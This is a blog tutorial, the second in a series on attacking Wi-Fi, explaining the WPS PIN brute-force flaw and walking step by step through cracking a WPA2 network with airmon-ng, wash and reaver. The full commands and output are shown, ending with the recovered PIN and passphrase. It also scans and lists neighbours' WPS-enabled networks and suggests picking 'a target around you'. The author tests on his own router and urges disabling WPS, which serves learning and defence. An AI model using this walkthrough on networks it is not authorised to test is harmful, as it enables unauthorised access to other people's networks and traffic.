Playing with other people Wi-Fi part 2: WPS, the “backdoor” to WPA
In the previous post here, I quickly showed the historical protection mechanism called WEP, its weaknesses and how to quickly crack it. The practical result of that problem is that we should all enable WPA or even better WPA2 protection protocols on our Wi-Fi networks. But even then you can have your network penetrated if you didn’t checked your Wi-Fi routers specifications properly and made sure to disable something called WPS ( Wi-Fi Protected Setup).
Wi-Fi Protected Setup (WPS) is a standard made by Wi-Fi Alliance in 2007 to enable more easier setup of new WPA/WPA2 network by users who are not computer skilled. It sounded like a greate idea in the beginning because there was a problem in that that most users are not aware that they should choose a good and big password to their WPA/WPA2 network in order to be protected from dictionary attacks. So WPS idea was that the encryption key of WPA/WPA2 will be autogenerated to a strong random key, but the end-user will not need to know it in order to connect his devices. Two most common ways how to connect with WPS are:
1) You push a button (either logical in web GUI or physical on the Wi-Fi AP) and for the next minute or so any device that will try to connect and supports WPS will negotiate a key with the Wi-Fi AP automatically. The new client from this point knows the secure password and is able to function normally.
2) On the back of your Wi-Fi AP, you will see an 8-digit PIN (on most models it can be changed). When you are connecting a new client to the WIFI, it will ask you to enter this PIN (if the client supports it, but everything from Vista upwards support this). Then again the new client negotiates the secure encryption key in the background and can function normally from that point.
The WPS idea sounds easy, but it was already proven as the weakest point you can have in your WPA/WPA2 network and what is even worse (or better depending what are your goals) is that most home router has this vulnerable feature enabled by default!
The history how it was cracked started in December 2011 when researcher Stefan Vielböck published a very nice way how to attack WPS in a simple manner. In summary the problem is that when the connecting client is validating the PIN number as an 8-digit, it is technically only 7-digit PIN as the 8th digit is technically a checksum result. That means that brute-force attack is easy in order of magnitude as we are having only 10^7 = 10,000,000 possible combinations. But this goes even lower! The problem is further that during PIN validation the
first 4 digits and then the 3 digits + 1digit checksum are validated separately and this means that you can separately attack 4digits = 10,000 possibilities and 3 digits = 1,000 possibilities = 11,000 possibilities and this is very low number for a brute force attack.
Contents
I really recommend you read the original 9-page document from Stefan Vielböck “Brute forcing Wi-Fi Protected Setup” (backup link) that describes this attack in a very easily understandable way.
A tool has been developed by a company called Tactical Network Solutions called reaver-wps to implement this attack. And to this date is implementing this attack as easy as using two or three commands.
Practical example how to crack WPA/WPA2 via WPS
First, lets look what do we need for this task. For the moral and legal reasons, please get your own access-point and configure it with WEP encryption. Then we need two PCs (technically possible with one and two Wi-Fi cards, but two PCs are better). One PC will act as a client (so that it will generate traffic) and the other PC will be for the attacker simulation. This part is taken from the previous article about test WEP cracking here.
Regarding my personal hardware, I have used a a TP-Link 722n wireless card, with a great external antenna adapter and good support from the hacking tools. As a target I used my TP-Link 741ND wifi router. As a test client I have used my iPhone.
For the software needed you can go in two directions, I personally have dual-boot with BackTrack Linux. This is ubuntu based distribution designed for penetration-testing and comes with all the best selection of security auditing and penetration testing tools as well as already modified drivers to support advanced attacks like arp-injection (which is not needed for a normal user). You can also simply download this image and start it as a live CD (or inside USB). Second option is to start your linux distribution (yes, you need one) and install aircrack-ng and reaver-wp software packageges.
NOTE: You will also need a Wi-Fi adapter that supports promiscuous mode. If you are going to buy a new Wi-Fi adapter for this, have a look on the aircrack-ng compatibility list.
Step 0. Initialize aircrack-ng promiscuous interface
This step is a repeat from previous article that can be found here, so I will make it a little bit more shorter this time. In summary find your wifi adapter in linux using the “ifconfig -a” command. It should be listed as either “wlanX” or “athX” interface depending on the chipset. Then we start the promiscuous mode with airmon-ng start <interface>. Example below of successfull creation.
root@bt:~# airmon-ng start wlan1
Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1314 dhclient3
1525 dhclient3
11757 dhclient
Process with PID 1525 (dhclient3) is running on interface wlan0
Interface Chipset Driver
wlan1 Atheros AR9271 ath9k - [phy1]
(monitor mode enabled on mon0)
wlan0 Intel 3945ABG iwl3945 - [phy0]
After this step, a new interface called mon0 should appear. Example below:
root@bt:~# ifconfig mon0
mon0 Link encap:UNSPEC HWaddr D8-5D-4C-91-AB-41-00-00-00-00-00-00-00-00-00-00
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:118351 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:28476367 (28.4 MB) TX bytes:0 (0.0 B)
This is your interface useful for aircrack and reaver-wp attacks. With this we can continue.
NOTE: For WPS attacks the packet injection support should not be mandatory as with the WEP attack.
Step 1. Creating your target WPA network (or choosing a target around you).
Well, in my case I have created a simple WPA2 protected network called WPAcrackTest by configuring my TP-Link 741ND. To show you how to search for vulnerable networks (like mine) lets use the “wash” utility. This utility scans surrounding networks and lists all networks that have WPS enabled. This is no form of attack because WPS capabilities are announced in the periodic Wi-Fi broadcasts to tell the clients they can use WPS to connect.
We will use the “wash” utility to identify all the networks around me that have WPS activated. Surprisingly, there are quite a lot in my apartment building and I had to edit them to hide identity of my neighbors. The one we will be cracking is my “WPAcrackTest”.
root@bt:~# wash -i mon0 Wash v1.4 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- CC:B2:55:5C:B1:EA 1 -90 1.0 No Ka<-OMITTED-> CC:5D:4E:30:83:2F 4 -88 1.0 No MI<-OMITTED-> C8:3A:35:03:BF:78 6 -86 1.0 No Ci<-OMITTED-> F8:D1:11:37:C2:0E 6 -82 1.0 No WPAcrackTest A0:F3:C1:D7:1A:FC 6 -76 1.0 No K4<-OMITTED-> 08:86:3B:B7:1B:F1 9 -80 1.0 No fi<-OMITTED-> B8:A3:86:A4:6A:7A 11 -87 1.0 No AN<-OMITTED-> E0:91:F5:BC:2B:FF 13 -94 1.0 Yes us<-OMITTED-> 00:22:75:B4:62:A4 1 -85 1.0 No Mi<-OMITTED-> BC:AE:C5:88:72:4C 6 -83 1.0 No AS<-OMITTED->
Step 2. Start attack on WPS with reaver-wp.
Now, cracking WPS is surprisingly much more easy than cracking WEP in previous article, but it will require some waiting time. The bellow command has a 12hour waiting time until the key was cracked successfully. The command is “reaver -i mon0 -b F8:D1:11:37:C2:0E -vv” and has the following paremeters:
-i mon0 // Specify the interface to use
-b F8:D1:11:37:C2:0E // The target AP mac-address
-vv // Double verbose mode to get extra
// debug messages
Now we execute and wait as shown below.
root@bt:~# reaver -i mon0 -b F8:D1:11:37:C2:0E -vv Reaver v1.4 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> [?] Restore previous session for F8:D1:11:37:C2:0E? [n/Y] Y [+] Waiting for beacon from F8:D1:11:37:C2:0E [+] Switching mon0 to channel 1 [+] Switching mon0 to channel 2 [+] Switching mon0 to channel 6 [+] Associated with F8:D1:11:37:C2:0E (ESSID: Ethernity) [+] Trying pin 12345670 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 00005678 [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Trying pin 01235678 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK '
< — AFTER some 12 hours of waiting and trying– >
[+] Trying pin 90852870 [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received M1 message [+] Sending M2 message [+] Received M3 message [+] Sending M4 message [+] Received WSC NACK [+] Sending WSC NACK [+] Pin cracked in 42664 seconds [+] WPS PIN: '90852893' [+] WPA PSK: 'VeryStronPassword123987456' [+] AP SSID: 'WPAcrackTest'
And here you have if folks, the PIN is cracked, we already have the password that is quite strong by any standard. But because of the WPS the Wi-Fi was cracked.
Summary
WPA/WPA2 are great standards that are hard to crack and fixed most of the problems of WEP. However with many of vendors implementing default WPS feature and many of the people not knowing enough to disable it (just look at my neighbors at Step 1. above), there is quite a renaissance in war-driving just because a simple feature going wrong.
In the next article, I am going to show you a little bit how to gain some distance for you Wi-Fi penetration testing with Yagi-Uda wifi antennas and some non-standard Wi-Fi adapters.
How about a WPS to client? I see all WPS vs AP, but can not find any info about vs client.
Hello mikw,
Technically the only WPS client I know about is directly inside Windows Vista/7. In these systemes when windows detects the Wi-Fi supports WPS, it will ask you if you would like to use WPS and enter the PIN or if you want to enter the encryption key manually. However I haven’t seen any stand-alone WPS client. For example there is no official WPS client even written for Linux systems (no WPS part of WPA-supplicant or “network manager” suite).
The only other “WPS client” I can think of for retrieving the encryption key on linux is to directly use the reaver with a legally known PIN. For example if I know my home AP pin is 12345678, then I can use this command to get the key directly:
# reaver -i mon0 -b F8:D1:11:37:C2:0E -p 12345678